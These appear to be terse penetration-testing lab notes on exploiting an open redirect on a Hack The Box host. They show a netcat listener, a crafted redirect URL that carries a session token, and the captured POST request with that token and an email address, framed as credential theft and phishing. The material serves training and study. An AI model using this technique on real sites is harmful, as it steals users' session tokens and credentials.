CREDENTIAL THEFT

#craft a malicious URL that appears to be from a legitimate website but redirects users to a phishing page.
#Users might think they’re logging into a real service, but their credentials get stolen

#walk the application
root@oco:~$ BROWSER > {targetSite:port}
 ...
 
 * submit expected input and identify potential entry points

#open redirect vulnerability
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > siteCookieValues
 Name: PHPSESSID (aka token)
 Value: ntrgep8modbid35j2me2thjjjt
 
 * if a token is included in the GET/POST Request, then it must be used as part of the request as it could be a session or anti-CSRF token and, therefore, useful to an attacker.

root@oco:~$ nc -nlvp 4444
root@oco:~$ BROWSER > {targetSite:port}/index.php?url={attackerNetcatListenerIP&Port}&token={tokenValue}

 * the target must enter input into any form in order for this to work
    - e.g., providing email address on the form, etc

root@oco:~$ nc...
 listening on [any] 4444 ...
 connect to [10.10.14.35] from (UNKNOWN) [10.10.14.35] 41650
 POST / HTTP/1.1
 Host: 10.10.14.35:4444
 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://oredirect.htb.net/
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 84
 Origin: http://oredirect.htb.net
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 Sec-GPC: 1
 Priority: u=0, i

 email=null%40null.com&recover-submit=Reset+Password&token=ntrgep8modbid35j2me2thjjjt